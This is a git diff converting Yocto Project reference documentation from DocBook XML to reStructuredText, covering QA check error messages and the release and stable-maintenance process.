-                    have a corresponding ABI package dependency.
-                    The xserver-xorg recipe provides driver ABI names.
-                    All drivers should depend on the ABI versions that they have
-                    been built against.
-                    Driver recipes that include
-                    <filename>xorg-driver-input.inc</filename> or
-                    <filename>xorg-driver-video.inc</filename> will
-                    automatically get these versions.
-                    Consequently, you should only need to explicitly add
-                    dependencies to binary driver recipes.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-infodir'>
-                    <code>
-     The /usr/share/info/dir file is not meant to be shipped in a particular package. [infodir]
-                    </code>
-                </para>
-
-                <para>
-                    The <filename>/usr/share/info/dir</filename> should not be
-                    packaged.
-                    Add the following line to your
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task or to your <filename>do_install_append</filename>
-                    within the recipe as follows:
-                    <literallayout class='monospaced'>
-     rm ${D}${infodir}/dir
-                    </literallayout>
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-symlink-to-sysroot'>
-                    <code>
-     Symlink &lt;path&gt; in &lt;packagename&gt; points to TMPDIR [symlink-to-sysroot]
-                    </code>
-                </para>
-
-                <para>
-                    The specified symlink points into
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                    on the host.
-                    Such symlinks will work on the host.
-                    However, they are clearly invalid when running on
-                    the target.
-                    You should either correct the symlink to use a relative
-                    path or remove the symlink.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-la'>
-                    <code>
-     &lt;file&gt; failed sanity test (workdir) in path &lt;path&gt; [la]
-                    </code>
-                </para>
-
-                <para>
-                    The specified <filename>.la</filename> file contains
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
-                    paths.
-                    Any <filename>.la</filename> file containing these paths
-                    is incorrect since <filename>libtool</filename> adds the
-                    correct sysroot prefix when using the files automatically
-                    itself.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-pkgconfig'>
-                    <code>
-     &lt;file&gt; failed sanity test (tmpdir) in path &lt;path&gt; [pkgconfig]
-                    </code>
-                </para>
-
-                <para>
-                    The specified <filename>.pc</filename> file contains
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link><filename>/</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
-                    paths.
-                    Any <filename>.pc</filename> file containing these paths is
-                    incorrect since <filename>pkg-config</filename> itself adds
-                    the correct sysroot prefix when the files are accessed.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-debug-deps'>
-                    <code>
-     &lt;packagename&gt; rdepends on &lt;debug_packagename&gt; [debug-deps]
-                    </code>
-                </para>
-
-                <para>
-                    A dependency exists between the specified non-dbg package
-                    (i.e. a package whose name does not end in
-                    <filename>-dbg</filename>) and a package that is a
-                    <filename>dbg</filename> package.
-                    The <filename>dbg</filename> packages contain
-                    debug symbols and are brought in using several
-                    different methods:
-                    <itemizedlist>
-                        <listitem><para>
-                            Using the <filename>dbg-pkgs</filename>
-                            <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                            value.
-                            </para></listitem>
-                        <listitem><para>
-                            Using
-                            <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>.
-                            </para></listitem>
-                        <listitem><para>
-                            As a dependency of another
-                            <filename>dbg</filename> package that was brought
-                            in using one of the above methods.
-                            </para></listitem>
-                    </itemizedlist>
-                    The dependency might have been automatically added
-                    because the <filename>dbg</filename> package erroneously
-                    contains files that it should not contain (e.g. a
-                    non-symlink <filename>.so</filename> file) or it might
-                    have been added manually (e.g. by adding to
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>).
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-dev-deps'>
-                    <code>
-     &lt;packagename&gt; rdepends on &lt;dev_packagename&gt; [dev-deps]
-                    </code>
-                </para>
-
-                <para>
-                    A dependency exists between the specified non-dev package
-                    (a package whose name does not end in
-                    <filename>-dev</filename>) and a package that is a
-                    <filename>dev</filename> package.
-                    The <filename>dev</filename> packages contain development
-                    headers and are usually brought in using several different
-                    methods:
-                    <itemizedlist>
-                        <listitem><para>
-                            Using the <filename>dev-pkgs</filename>
-                            <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
-                            value.
-                            </para></listitem>
-                        <listitem><para>
-                            Using
-                            <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>.
-                            </para></listitem>
-                        <listitem><para>
-                            As a dependency of another
-                            <filename>dev</filename> package that was brought
-                            in using one of the above methods.
-                            </para></listitem>
-                    </itemizedlist>
-                    The dependency might have been automatically added (because
-                    the <filename>dev</filename> package erroneously contains
-                    files that it should not have (e.g. a non-symlink
-                    <filename>.so</filename> file) or it might have been added
-                    manually (e.g. by adding to
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>).
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-dep-cmp'>
-                    <code>
-     &lt;var&gt;_&lt;packagename&gt; is invalid: &lt;comparison&gt; (&lt;value&gt;)   only comparisons &lt;, =, &gt;, &lt;=, and &gt;= are allowed [dep-cmp]
-                    </code>
-                </para>
-
-                <para>
-                    If you are adding a versioned dependency relationship to one
-                    of the dependency variables
-                    (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
-                    <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
-                    <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
-                    <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
-                    or
-                    <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>),
-                    you must only use the named comparison operators.
-                    Change the versioned dependency values you are adding
-                    to match those listed in the message.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-compile-host-path'>
-                    <code>
-     &lt;recipename&gt;: The compile log indicates that host include and/or library paths were used. Please check the log '&lt;logfile&gt;' for more information. [compile-host-path]
-                    </code>
-                </para>
-
-                <para>
-                    The log for the
-                    <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
-                    task indicates that paths on the host were searched
-                    for files, which is not appropriate when cross-compiling.
-                    Look for "is unsafe for cross-compilation" or "CROSS COMPILE
-                    Badness" in the specified log file.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-install-host-path'>
-                    <code>
-     &lt;recipename&gt;: The install log indicates that host include and/or library paths were used. Please check the log '&lt;logfile&gt;' for more information. [install-host-path]
-                    </code>
-                </para>
-
-                <para>
-                    The log for the
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task indicates that paths on the host were searched
-                    for files, which is not appropriate when cross-compiling.
-                    Look for "is unsafe for cross-compilation"
-                    or "CROSS COMPILE Badness" in the specified log file.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-autoconf-log'>
-                    <code>
-     This autoconf log indicates errors, it looked at host include and/or library paths while determining system capabilities. Rerun configure task after fixing this. The path was '&lt;path&gt;'
-                    </code>
-                </para>
-
-                <para>
-                    The log for the
-                    <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-                    task indicates that paths on the host were searched
-                    for files, which is not appropriate when cross-compiling.
-                    Look for "is unsafe for cross-compilation" or
-                    "CROSS COMPILE Badness" in the specified log file.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-pkgname'>
-                    <code>
-     &lt;packagename&gt; doesn't match the [a-z0-9.+-]+ regex [pkgname]
-                    </code>
-                </para>
-
-                <para>
-                    The convention within the OpenEmbedded build system
-                    (sometimes enforced by the package manager itself) is to
-                    require that package names are all lower case
-                    and to allow a restricted set of characters.
-                    If your recipe name does not match this, or you add
-                    packages to
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                    that do not conform to the convention, then you
-                    will receive this error.
-                    Rename your recipe.
-                    Or, if you have added a non-conforming package name to
-                    <filename>PACKAGES</filename>, change the package name
-                    appropriately.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-unknown-configure-option'>
-                    <code>
-     &lt;recipe&gt;: configure was passed unrecognized options: &lt;options&gt; [unknown-configure-option]
-                    </code>
-                </para>
-
-                <para>
-                    The configure script is reporting that the specified
-                    options are unrecognized.
-                    This situation could be because the options
-                    were previously valid but have been removed from the
-                    configure script.
-                    Or, there was a mistake when the options were added
-                    and there is another option that should be used instead.
-                    If you are unsure, consult the upstream build
-                    documentation, the
-                    <filename>./configure --help</filename> output,
-                    and the upstream change log or release notes.
-                    Once you have worked out what the appropriate
-                    change is, you can update
-                    <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>,
-                    <link linkend='var-PACKAGECONFIG_CONFARGS'><filename>PACKAGECONFIG_CONFARGS</filename></link>,
-                    or the individual
-                    <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
-                    option values accordingly.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-pn-overrides'>
-                    <code>
-     Recipe &lt;recipefile&gt; has PN of "&lt;recipename&gt;" which is in OVERRIDES, this can result in unexpected behavior. [pn-overrides]
-                    </code>
-                </para>
-
-                <para>
-                    The specified recipe has a name
-                    (<link linkend='var-PN'><filename>PN</filename></link>)
-                    value that appears in
-                    <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>.
-                    If a recipe is named such that its <filename>PN</filename>
-                    value matches something already in
-                    <filename>OVERRIDES</filename> (e.g. <filename>PN</filename>
-                    happens to be the same as
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    or
-                    <link linkend='var-DISTRO'><filename>DISTRO</filename></link>),
-                    it can have unexpected consequences.
-                    For example, assignments such as
-                    <filename>FILES_${PN} = "xyz"</filename> effectively
-                    turn into <filename>FILES = "xyz"</filename>.
-                    Rename your recipe (or if <filename>PN</filename> is being
-                    set explicitly, change the <filename>PN</filename> value) so
-                    that the conflict does not occur.
-                    See
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    for additional information.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-pkgvarcheck'>
-                    <code>
-     &lt;recipefile&gt;: Variable &lt;variable&gt; is set as not being package specific, please fix this. [pkgvarcheck]
-                    </code>
-                </para>
-
-                <para>
-                    Certain variables
-                    (<link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
-                    <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
-                    <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>,
-                    <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
-                    <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
-                    <link linkend='var-FILES'><filename>FILES</filename></link>,
-                    <filename>pkg_preinst</filename>,
-                    <filename>pkg_postinst</filename>,
-                    <filename>pkg_prerm</filename>,
-                    <filename>pkg_postrm</filename>, and
-                    <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>)
-                    should always be set specific to a package (i.e. they
-                    should be set with a package name override such as
-                    <filename>RDEPENDS_${PN} = "value"</filename> rather than
-                    <filename>RDEPENDS = "value"</filename>).
-                    If you receive this error, correct any assignments to these
-                    variables within your recipe.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-already-stripped'>
-                    <code>
-     File '&lt;file&gt;' from &lt;recipename&gt; was already stripped, this will prevent future debugging! [already-stripped]
-                    </code>
-                </para>
-
-                <para>
-                    Produced binaries have already been stripped prior to the
-                    build system extracting debug symbols.
-                    It is common for upstream software projects to default to
-                    stripping debug symbols for output binaries.
-                    In order for debugging to work on the target using
-                    <filename>-dbg</filename> packages, this stripping must be
-                    disabled.
-                </para>
-
-                <para>
-                    Depending on the build system used by the software being
-                    built, disabling this stripping could be as easy as
-                    specifying an additional configure option.
-                    If not, disabling stripping might involve patching
-                    the build scripts.
-                    In the latter case, look for references to "strip" or
-                    "STRIP", or the "-s" or "-S" command-line options being
-                    specified on the linker command line (possibly
-                    through the compiler command line if preceded with "-Wl,").
-                    <note>
-                        Disabling stripping here does not mean that the final
-                        packaged binaries will be unstripped.
-                        Once the OpenEmbedded build system splits out debug
-                        symbols to the <filename>-dbg</filename> package,
-                        it will then strip the symbols from the binaries.
-                    </note>
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-packages-list'>
-                    <code>
-     &lt;packagename&gt; is listed in PACKAGES multiple times, this leads to packaging errors. [packages-list]
-                    </code>
-                </para>
-
-                <para>
-                    Package names must appear only once in the
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                    variable.
-                    You might receive this error if you are attempting to add a
-                    package to <filename>PACKAGES</filename> that is
-                    already in the variable's value.
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-files-invalid'>
-                    <code>
-     FILES variable for package &lt;packagename&gt; contains '//' which is invalid. Attempting to fix this but you should correct the metadata. [files-invalid]
-                    </code>
-                </para>
-
-                <para>
-                    The string "//" is invalid in a Unix path.
-                    Correct all occurrences where this string appears in a
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    variable so that there is only a single "/".
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-installed-vs-shipped'>
-                    <code>
-      &lt;recipename&gt;: Files/directories were installed but not shipped in any package [installed-vs-shipped]
-                    </code>
-                </para>
-
-                <para>
-                    Files have been installed within the
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    task but have not been included in any package by way of the
-                    <link linkend='var-FILES'><filename>FILES</filename></link>
-                    variable.
-                    Files that do not appear in any package cannot be present in
-                    an image later on in the build process.
-                    You need to do one of the following:
-                    <itemizedlist>
-                        <listitem><para>
-                            Add the files to <filename>FILES</filename> for the
-                            package you want them to appear in (e.g.
-                            <filename>FILES_${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename> for the main
-                            package).
-                            </para></listitem>
-                        <listitem><para>
-                            Delete the files at the end of the
-                            <filename>do_install</filename> task if the files
-                            are not needed in any package.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    &nbsp;
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        <itemizedlist>
-            <listitem>
-                <para id='qa-issue-old-and-new-package-and-version-names'>
-                    <code>
-     &lt;oldpackage&gt;-&lt;oldpkgversion&gt; was registered as shlib provider for &lt;library&gt;, changing it to &lt;newpackage&gt;-&lt;newpkgversion&gt; because it was built later
-                    </code>
-                </para>
-
-                <para>
-                    This message means that both
-                    <filename>&lt;oldpackage&gt;</filename> and
-                    <filename>&lt;newpackage&gt;</filename> provide the specified
-                    shared library.
-                    You can expect this message when a recipe has been renamed.
-                    However, if that is not the case, the message might indicate
-                    that a private version of a library is being erroneously
-                    picked up as the provider for a common library.
-                    If that is the case, you should add the library's
-                    <filename>.so</filename> file name to
-                    <link linkend='var-PRIVATE_LIBS'><filename>PRIVATE_LIBS</filename></link>
-                    in the recipe that provides
-                    the private version of the library.
-                </para>
-            </listitem>
-        </itemizedlist>
-    </para>
-</section>
-
-<section id='configuring-and-disabling-qa-checks'>
-    <title>Configuring and Disabling QA Checks</title>
-
-    <para>
-        You can configure the QA checks globally so that specific check
-        failures either raise a warning or an error message, using the
-        <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link> and
-        <link linkend='var-ERROR_QA'><filename>ERROR_QA</filename></link>
-        variables, respectively.
-        You can also disable checks within a particular recipe using
-        <link linkend='var-INSANE_SKIP'><filename>INSANE_SKIP</filename></link>.
-        For information on how to work with the QA checks, see the
-        "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-        section.
-        <note><title>Tip</title>
-            Please keep in mind that the QA checks exist in order to
-            detect real or potential problems in the packaged output.
-            So exercise caution when disabling these checks.
-        </note>
-    </para>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-release-process.rst b/documentation/ref-manual/ref-release-process.rst
new file mode 100644
index 0000000000..8dcbea7beb
--- /dev/null
+++ b/documentation/ref-manual/ref-release-process.rst
@@ -0,0 +1,191 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************************************
+Yocto Project Releases and the Stable Release Process
+*****************************************************
+
+The Yocto Project release process is predictable and consists of both
+major and minor (point) releases. This brief chapter provides
+information on how releases are named, their life cycle, and their
+stability.
+
+Major and Minor Release Cadence
+===============================
+
+The Yocto Project delivers major releases (e.g. DISTRO) using a six
+month cadence roughly timed each April and October of the year.
+Following are examples of some major YP releases with their codenames
+also shown. See the "`Major Release
+Codenames <#major-release-codenames>`__" section for information on
+codenames used with major releases.
+
+  - 2.2 (Morty) 
+  - 2.1 (Krogoth)
+  - 2.0 (Jethro) 
+
+While the cadence is never perfect, this timescale facilitates
+regular releases that have strong QA cycles while not overwhelming users
+with too many new releases. The cadence is predictable and avoids many
+major holidays in various geographies.
+
+The Yocto project delivers minor (point) releases on an unscheduled
+basis and are usually driven by the accumulation of enough significant
+fixes or enhancements to the associated major release. Following are
+some example past point releases:
+
+  - 2.1.1
+  - 2.1.2
+  - 2.2.1 
+
+The point release
+indicates a point in the major release branch where a full QA cycle and
+release process validates the content of the new branch.
+
+.. note::
+
+   Realize that there can be patches merged onto the stable release
+   branches as and when they become available.
+
+Major Release Codenames
+=======================
+
+Each major release receives a codename that identifies the release in
+the :ref:`overview-manual/overview-manual-development-environment:yocto project source repositories`.
+The concept is that branches of :term:`Metadata` with the same
+codename are likely to be compatible and thus work together.
+
+.. note::
+
+   Codenames are associated with major releases because a Yocto Project
+   release number (e.g. DISTRO) could conflict with a given layer or
+   company versioning scheme. Codenames are unique, interesting, and
+   easily identifiable.
+
+Releases are given a nominal release version as well but the codename is
+used in repositories for this reason. You can find information on Yocto
+Project releases and codenames at
+:yocto_wiki:`/wiki/Releases`.
+
+Stable Release Process
+======================
+
+Once released, the release enters the stable release process at which
+time a person is assigned as the maintainer for that stable release.
+This maintainer monitors activity for the release by investigating and
+handling nominated patches and backport activity. Only fixes and
+enhancements that have first been applied on the "master" branch (i.e.
+the current, in-development branch) are considered for backporting to a
+stable release.
+
+.. note::
+
+   The current Yocto Project policy regarding backporting is to consider
+   bug fixes and security fixes only. Policy dictates that features are
+   not backported to a stable release. This policy means generic recipe
+   version upgrades are unlikely to be accepted for backporting. The
+   exception to this policy occurs when a strong reason exists such as
+   the fix happens to also be the preferred upstream approach.
+
+Stable release branches have strong maintenance for about a year after
+their initial release. Should significant issues be found for any
+release regardless of its age, fixes could be backported to older
+releases. For issues that are not backported given an older release,
+Community LTS trees and branches exist where community members share
+patches for older releases. However, these types of patches do not go
+through the same release process as do point releases. You can find more
+information about stable branch maintenance at
+:yocto_wiki:`/wiki/Stable_branch_maintenance`.
+
+Testing and Quality Assurance
+=============================
+
+Part of the Yocto Project development and release process is quality
+assurance through the execution of test strategies. Test strategies
+provide the Yocto Project team a way to ensure a release is validated.
+Additionally, because the test strategies are visible to you as a
+developer, you can validate your projects. This section overviews the
+available test infrastructure used in the Yocto Project. For information
+on how to run available tests on your projects, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+The QA/testing infrastructure is woven into the project to the point
+where core developers take some of it for granted. The infrastructure
+consists of the following pieces:
+
+-  ``bitbake-selftest``: A standalone command that runs unit tests on
+   key pieces of BitBake and its fetchers.
+
+-  :ref:`sanity.bbclass <ref-classes-sanity>`: This automatically
+   included class checks the build environment for missing tools (e.g.
+   ``gcc``) or common misconfigurations such as
+   :term:`MACHINE` set incorrectly.
+
+-  :ref:`insane.bbclass <ref-classes-insane>`: This class checks the
+   generated output from builds for sanity. For example, if building for
+   an ARM target, did the build produce ARM binaries. If, for example,
+   the build produced PPC binaries then there is a problem.
+
+-  :ref:`testimage.bbclass <ref-classes-testimage*>`: This class
+   performs runtime testing of images after they are built. The tests
+   are usually used with :doc:`QEMU <../dev-manual/dev-manual-qemu>`
+   to boot the images and check the combined runtime result boot
+   operation and functions. However, the test can also use the IP
+   address of a machine to test.
+
+-  :ref:`ptest <dev-manual/dev-manual-common-tasks:testing packages with ptest>`:
+   Runs tests against packages produced during the build for a given
+   piece of software. The test allows the packages to be be run within a
+   target image.
+
+-  ``oe-selftest``: Tests combinations of BitBake invocations. These tests
+   operate outside the OpenEmbedded build system itself. The
+   ``oe-selftest`` can run all tests by default or can run selected
+   tests or test suites.
+
+   .. note::
+
+      Running ``oe-selftest`` requires host packages beyond the "Essential"
+      grouping. See the :ref:`ref-manual/ref-system-requirements:required packages for the build host`
+      section for more information.
+
+Originally, much of this testing was done manually. However, significant
+effort has been made to automate the tests so that more people can use
+them and the Yocto Project development team can run them faster and more
+efficiently.
+
+The Yocto Project's main Autobuilder (&YOCTO_AB_URL;)
+publicly tests each Yocto Project release's code in the
+:term:`OpenEmbedded-Core (OE-Core)`, Poky, and BitBake repositories. The testing
+occurs for both the current state of the "master" branch and also for
+submitted patches. Testing for submitted patches usually occurs in the
+"ross/mut" branch in the ``poky-contrib`` repository (i.e. the
+master-under-test branch) or in the "master-next" branch in the ``poky``
+repository.
+
+.. note::
+
+   You can find all these branches in the Yocto Project
+   Source Repositories
+   .
+
+Testing within these public branches ensures in a publicly visible way
+that all of the main supposed architectures and recipes in OE-Core
+successfully build and behave properly.
+
+Various features such as ``multilib``, sub architectures (e.g. ``x32``,
+``poky-tiny``, ``musl``, ``no-x11`` and and so forth),
+``bitbake-selftest``, and ``oe-selftest`` are tested as part of the QA
+process of a release. Complete testing and validation for a release
+takes the Autobuilder workers several hours.
+
+.. note::
+
+   The Autobuilder workers are non-homogeneous, which means regular
+   testing across a variety of Linux distributions occurs. The
+   Autobuilder is limited to only testing QEMU-based setups and not real
+   hardware.
+
+Finally, in addition to the Autobuilder's tests, the Yocto Project QA
+team also performs testing on a variety of platforms, which includes
+actual hardware, to ensure expected results.
diff --git a/documentation/ref-manual/ref-release-process.xml b/documentation/ref-manual/ref-release-process.xml
deleted file mode 100644
index 5efe17417a..0000000000
--- a/documentation/ref-manual/ref-release-process.xml
+++ /dev/null
@@ -1,255 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-release-process'>
-<title>Yocto Project Releases and the Stable Release Process</title>
-
-<para>
-    The Yocto Project release process is predictable and consists of both
-    major and minor (point) releases.
-    This brief chapter provides information on how releases are named, their
-    life cycle, and their stability.
-</para>
-
-<section id='major-and-minor-release-cadence'>
-    <title>Major and Minor Release Cadence</title>
-
-    <para>
-        The Yocto Project delivers major releases (e.g. &DISTRO;) using a six
-        month cadence roughly timed each April and October of the year.
-        Following are examples of some major YP releases with their codenames
-        also shown.
-        See the
-        "<link linkend='major-release-codenames'>Major Release Codenames</link>"
-        section for information on codenames used with major releases.
-        <literallayout class='monospaced'>
-    2.2 (Morty)
-    2.1 (Krogoth)
-    2.0 (Jethro)
-        </literallayout>
-        While the cadence is never perfect, this timescale facilitates
-        regular releases that have strong QA cycles while not overwhelming
-        users with too many new releases.
-        The cadence is predictable and avoids many major holidays in various
-        geographies.
-    </para>
-
-    <para>
-        The Yocto project delivers minor (point) releases on an unscheduled
-        basis and are usually driven by the accumulation of enough significant
-        fixes or enhancements to the associated major release.
-        Following are some example past point releases:
-        <literallayout class='monospaced'>
-    2.1.1
-    2.1.2
-    2.2.1
-        </literallayout>
-        The point release indicates a point in the major release branch where
-        a full QA cycle and release process validates the content of the new
-        branch.
-        <note>
-            Realize that there can be patches merged onto the stable release
-            branches as and when they become available.
-        </note>
-    </para>
-</section>
-
-<section id='major-release-codenames'>
-    <title>Major Release Codenames</title>
-
-    <para>
-        Each major release receives a codename that identifies the release in
-        the
-        <ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>.
-        The concept is that branches of
-        <link linkend='metadata'>Metadata</link>
-        with the same codename are likely to be compatible and thus
-        work together.
-        <note>
-            Codenames are associated with major releases because a Yocto
-            Project release number (e.g. &DISTRO;) could conflict with
-            a given layer or company versioning scheme.
-            Codenames are unique, interesting, and easily identifiable.
-        </note>
-        Releases are given a nominal release version as well but the codename
-        is used in repositories for this reason.
-        You can find information on Yocto Project releases and codenames at
-        <ulink url='https://wiki.yoctoproject.org/wiki/Releases'></ulink>.
-    </para>
-</section>
-
-<section id='stable-release-process'>
-    <title>Stable Release Process</title>
-
-    <para>
-        Once released, the release enters the stable release process at which
-        time a person is assigned as the maintainer for that stable release.
-        This maintainer monitors activity for the release by investigating
-        and handling nominated patches and backport activity.
-        Only fixes and enhancements that have first been applied on the
-        "master" branch (i.e. the current, in-development branch) are
-        considered for backporting to a stable release.
-        <note>
-            The current Yocto Project policy regarding backporting is to
-            consider bug fixes and security fixes only.
-            Policy dictates that features are not backported to a stable
-            release.
-            This policy means generic recipe version upgrades are unlikely to
-            be accepted for backporting.
-            The exception to this policy occurs when a strong reason exists
-            such as the fix happens to also be the preferred upstream approach.
-        </note>
-    </para>
-
-    <para>
-        Stable release branches have strong maintenance for about a year after
-        their initial release.
-        Should significant issues be found for any release regardless of its
-        age, fixes could be backported to older releases.
-        For issues that are not backported given an older release,
-        Community LTS trees and branches exist where
-        community members share patches for older releases.
-        However, these types of patches do not go through the same release
-        process as do point releases.
-        You can find more information about stable branch maintenance at
-        <ulink url='https://wiki.yoctoproject.org/wiki/Stable_branch_maintenance'></ulink>.
-    </para>
-</section>
-
-<section id='testing-and-quality-assurance'>
-    <title>Testing and Quality Assurance</title>
-
-    <para>
-        Part of the Yocto Project development and release process is quality
-        assurance through the execution of test strategies.
-        Test strategies provide the Yocto Project team a way to ensure a
-        release is validated.
-        Additionally, because the test strategies are visible to you as a
-        developer, you can validate your projects.
-        This section overviews the available test infrastructure used in the
-        Yocto Project.
-        For information on how to run available tests on your projects, see the
-        "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-        section in the Yocto Project Development Tasks Manual.
-    </para>
-
-    <para>
-        The QA/testing infrastructure is woven into the project to the point
-        where core developers take some of it for granted.
-        The infrastructure consists of the following pieces:
-        <itemizedlist>
-            <listitem><para>
-                <filename>bitbake-selftest</filename>:
-                A standalone command that runs unit tests on key pieces of
-                BitBake and its fetchers.
-                </para></listitem>
-            <listitem><para>
-                <link linkend='ref-classes-sanity'><filename>sanity.bbclass</filename></link>:
-                This automatically included class checks the build environment
-                for missing tools (e.g. <filename>gcc</filename>) or common
-                misconfigurations such as
-                <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                set incorrectly.
-                </para></listitem>
-            <listitem><para>
-                <link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>:
-                This class checks the generated output from builds for sanity.
-                For example, if building for an ARM target, did the build
-                produce ARM binaries.
-                If, for example, the build produced PPC binaries then there
-                is a problem.
-                </para></listitem>
-            <listitem><para>
-                <link linkend='ref-classes-testimage*'><filename>testimage.bbclass</filename></link>:
-                This class performs runtime testing of images after they are
-                built.
-                The tests are usually used with
-                <ulink url='&YOCTO_DOCS_DEV_URL;#dev-manual-qemu'>QEMU</ulink>
-                to boot the images and check the combined runtime result
-                boot operation and functions.
-                However, the test can also use the IP address of a machine to
-                test.
-                </para></listitem>
